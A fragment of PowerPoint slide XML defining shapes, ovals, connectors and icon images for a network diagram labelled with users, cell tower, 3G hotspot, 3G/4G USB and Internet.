                <a:ext cx="300866" cy="409485"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grp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90FE5A6D-5FCE-473C-BB28-0C1D2FD307D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7643223" y="4160520"/>
            <a:ext cx="4074886" cy="2313489"/>
            <a:chOff x="7431314" y="4114800"/>
            <a:chExt cx="4074886" cy="2313489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="390" name="Rectangle 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ECD5AB8-AA6D-45C6-8E2C-04B75987E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1314" y="4114800"/>
              <a:ext cx="4074886" cy="2313489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FFFF">
                    <a:gamma/>
                    <a:shade val="89020"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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91" name="Rectangle 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D370C0E2-BBF5-4FE1-B518-18CF9959F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3361" y="4130741"/>
              <a:ext cx="4050792" cy="2281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F1F1FBD-D728-4980-A3D1-241F6CB2F618}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7521973" y="4169371"/>
              <a:ext cx="3827584" cy="2198689"/>
              <a:chOff x="7910800" y="4010747"/>
              <a:chExt cx="3827584" cy="2198689"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="393" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA8CD59A-B3AE-4250-8CC5-96E560768F39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8054757" y="4073688"/>
                <a:ext cx="2060060" cy="2056995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94" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0E82BA3-D220-460D-AA14-1FE26D674166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8189507" y="4214696"/>
                <a:ext cx="1789482" cy="1786819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95" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF457219-93DC-403C-B1BF-D6CA955322FD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8338271" y="4369697"/>
                <a:ext cx="1504889" cy="1502651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96" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DA5E12-3355-40DF-A595-2E527EC518E1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8467631" y="4524698"/>
                <a:ext cx="1220297" cy="1218481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97" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669EE1BD-4D83-4FF6-BB6D-1E75EC841658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8616395" y="4673241"/>
                <a:ext cx="935705" cy="934313"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C0">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:solidFill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pic>
            <p:nvPicPr>
              <p:cNvPr id="398" name="Picture 42" descr="E:\Web2.0 PNG Icons\mon.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5707051A-3F40-41B9-B593-DCF83727FA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214781" y="4179622"/>
                <a:ext cx="285514" cy="28961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99" name="Picture 44" descr="E:\Web2.0 PNG Icons\laptop10.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0CDF745-4C56-4C6E-B431-109BA39C7D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84687" y="4661322"/>
                <a:ext cx="353159" cy="35315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00" name="Picture 32" descr="E:\haja Premium\Wireless_Signal.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B890F46B-68CA-44AE-BF5F-8127806481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6393200">
                <a:off x="10782026" y="5069868"/>
                <a:ext cx="396297" cy="39629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01" name="Picture 47" descr="C:\Users\conference\Desktop\1286526522_drive-harddisk-usb.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10F5A5A-9287-43E0-8D01-D904F0EE17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5400000">
                <a:off x="10341323" y="4843156"/>
                <a:ext cx="607277" cy="60727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EB7BA60D-D028-4905-8FDD-357F7D66E0B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1386637" y="4774449"/>
                <a:ext cx="10633" cy="670775"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050"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3" name="Rectangle 402">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED98570-E54F-49FD-AF4B-8B5042388C48}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8039013" y="5017524"/>
                <a:ext cx="423514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Users</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="404" name="Rectangle 403">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6E82060-2F73-4722-B851-EF4F1E57FB46}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11103274" y="5993992"/>
                <a:ext cx="635110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Cell Tower</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="405" name="Rectangle 404">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DCE51D-283A-417C-AC0B-81D0E77E65B4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8735063" y="5386860"/>
                <a:ext cx="663964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3G Hotspot</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="406" name="Rectangle 405">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DE73CC4-5D4A-442F-8629-12CF37726727}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11129663" y="4010747"/>
                <a:ext cx="530915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Internet</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="407" name="Rectangle 406">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7FEB932-DF29-4223-93AA-5FDA37B13C24}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10326010" y="5470271"/>
                <a:ext cx="80663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3G Connection</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="408" name="Rectangle 407">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B287841-96B6-43F4-996E-822DAD946EFA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10356912" y="4812207"/>
                <a:ext cx="659155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3G/4G USB</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="409" name="Straight Connector 408">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D63E631-760B-4895-BC82-D1E0E26617DD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9823355" y="5164872"/>
                <a:ext cx="484632" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="28575">
                <a:prstDash val="sysDot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10" name="Picture 61" descr="X:\Web2.0 PNG Icons\Haja Roger Shutterstock\u1.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0175288-9FFD-4FF9-BCDB-D825ED7618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16707" y="4067616"/>
                <a:ext cx="276182" cy="393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11" name="Picture 63" descr="E:\haja Premium\Laptop1.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9BB38BC-778C-4162-BCC4-B0188ACA7E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022353" y="5853457"/>
                <a:ext cx="399245" cy="28346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12" name="Picture 2" descr="F:\Prashant DATA\ICONS\Web2.0 PNG Icons\Globe and Internet\Globe 1.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B521D83-BFF5-4028-81F5-5912140FB7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03253" y="4207109"/>
                <a:ext cx="583734" cy="58373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13" name="Picture 412">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18D58854-4CEB-4BA0-97D4-0B1FC3AF13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 cstate="print">
                <a:extLst>
                  <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                    <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <a14:imgLayer r:embed="rId29">
                        <a14:imgEffect>
                          <a14:brightnessContrast contrast="4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1111747" y="5357027"/>
                <a:ext cx="581102" cy="623155"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="414" name="Picture 413">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FAFA75-5811-47DE-9901-3794500B2A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069108" y="4121472"/>
                <a:ext cx="296037" cy="308908"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="415" name="Group 414">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7867699F-E62F-4A82-8775-62023180E2BB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7993042" y="5694901"/>
                <a:ext cx="615655" cy="508649"/>
                <a:chOff x="7993042" y="5694901"/>
                <a:chExt cx="615655" cy="508649"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="429" name="Picture 428">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00866653-2C8F-4CCA-B77D-ACFE4DDD325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197540" y="5792393"/>
                  <a:ext cx="411157" cy="411157"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="430" name="Picture 429">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13AC6A50-0522-41AE-81E1-FEB26F9FCC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993042" y="5694901"/>
                  <a:ext cx="296037" cy="485595"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="416" name="Group 415">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353E76D6-954F-4E87-BA10-5B3156860C42}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7912073" y="5182372"/>
                <a:ext cx="549333" cy="470385"/>
                <a:chOff x="7912073" y="5182372"/>
                <a:chExt cx="549333" cy="470385"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="427" name="Picture 19" descr="C:\Users\conference\Desktop\ipad.png">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA8EF35-7BE7-47F1-8512-49393183209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99392" y="5252366"/>
                  <a:ext cx="262014" cy="334797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428" name="Picture 427">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4221A3-75F8-4CAD-8423-AB38FBBF86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912073" y="5182372"/>
                  <a:ext cx="315930" cy="470385"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="417" name="Picture 416">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC941A7-AD1D-41D6-97C3-545A5B48E4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282365" y="4885329"/>
                <a:ext cx="515431" cy="524635"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="418" name="Picture 417">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B7B0800-C225-4B7E-856B-83374B81B7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825514" y="4716946"/>
                <a:ext cx="536010" cy="689784"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="419" name="Picture 418">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12644251-4651-4ED4-9828-4AA43D1B7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817655" y="5708540"/>
                <a:ext cx="302681" cy="426460"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="420" name="Group 419">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1550DD-73B6-437C-B397-0E0AFAF3E1C1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="9489338" y="5646891"/>
                <a:ext cx="570450" cy="441466"/>
                <a:chOff x="12022049" y="1927388"/>
                <a:chExt cx="627496" cy="485613"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="425" name="Picture 424" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7BF1842-69CC-44A8-8E37-8411A518E22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2022049" y="2010716"/>
                  <a:ext cx="392615" cy="402285"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="426" name="Picture 425">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF00D40B-5B26-4DF6-BCB6-666E2B62E4B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2332444" y="1927388"/>
                  <a:ext cx="317101" cy="466874"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="421" name="Picture 420" descr="A close up of a womans face&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14CD1593-73CD-4992-92E6-2E3E19ED82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910800" y="4542327"/>
                <a:ext cx="297846" cy="439322"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="422" name="Picture 421">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E08F6D0-A95A-426F-B068-46789C4240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963412" y="4055053"/>
                <a:ext cx="319812" cy="436294"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="423" name="Picture 422" descr="A close up of a screen&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A688C35-A8BC-4A34-92E9-2E766EF9DF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436481" y="4158610"/>
                <a:ext cx="497500" cy="310938"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="424" name="Picture 423">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F226FA-9819-4DE9-B3DE-1490D3EAA9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779360" y="4074090"/>
                <a:ext cx="297021" cy="426788"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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B0F71736-3643-405A-BE05-F6B2646B1C6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="473892" y="4160520"/>
            <a:ext cx="4074886" cy="2313489"/>
            <a:chOff x="344714" y="4114800"/>
            <a:chExt cx="4074886" cy="2313489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="431" name="Rectangle 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{203DE593-9358-414A-BAB0-8F693BA45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14" y="4114800"/>
              <a:ext cx="4074886" cy="2313489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FFFFFF">
                    <a:gamma/>
                    <a:shade val="89020"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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32" name="Rectangle 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5C5EA4-41A3-412D-B25F-0562C2D62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761" y="4130741"/>
              <a:ext cx="4050792" cy="2281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433" name="Group 432">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D91D19D-BB40-4DDE-B85D-42546F635C2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="430327" y="4311132"/>
              <a:ext cx="3888592" cy="1920240"/>
              <a:chOff x="3496787" y="4152508"/>
              <a:chExt cx="3888592" cy="1920240"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="434" name="Rectangle 433">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84A8B63-E68C-4BF9-B9FC-D7970E7672C2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3540879" y="4152508"/>
                <a:ext cx="1828800" cy="192024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  <a:prstDash val="sysDot"/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none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5" name="Rectangle 434">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5074BAF-9E96-4D8F-88D0-E3D6D70EE3A8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5526464" y="4152508"/>
                <a:ext cx="1828800" cy="192024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  <a:prstDash val="sysDot"/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none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6" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D4C420-4EAB-44A8-8595-44D95E4B789B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5251030" y="4316022"/>
                <a:ext cx="1602601" cy="1600217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7" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D76BBB44-F416-42ED-94CF-71053D250209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5355857" y="4425718"/>
                <a:ext cx="1392107" cy="1390037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8" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{658FDE16-B6E7-4300-BA2E-6951AB302640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5471587" y="4546299"/>
                <a:ext cx="1170712" cy="1168971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9" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50AD84F0-12FD-4A3F-85AC-38A7A9FDA45D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5572221" y="4666881"/>
                <a:ext cx="949317" cy="947904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40" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BF1BFE-F98E-4320-953C-C5DA87324E56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5687950" y="4782438"/>
                <a:ext cx="727921" cy="726838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41" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A560F48-9B31-420D-8FCD-CB5045742CFD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3980705" y="4316022"/>
                <a:ext cx="1602601" cy="1600217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42" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72FFBDBE-49A0-4346-9437-D174EE545242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4085532" y="4425718"/>
                <a:ext cx="1392107" cy="1390037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43" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05DB0BFF-DA4D-426A-A7CB-57E7B9B06CB0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4201262" y="4546299"/>
                <a:ext cx="1170712" cy="1168971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44" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39B3FE6A-259B-43C3-AA23-EC677FED873E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4301896" y="4666881"/>
                <a:ext cx="949317" cy="947904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45" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05750657-0EC6-48CC-B4E5-07DF38BADCB5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4417625" y="4782438"/>
                <a:ext cx="727921" cy="726838"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="C0C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pic>
            <p:nvPicPr>
              <p:cNvPr id="446" name="Picture 21" descr="X:\Web2.0 PNG Icons\Haja Roger Shutterstock\dos.png">
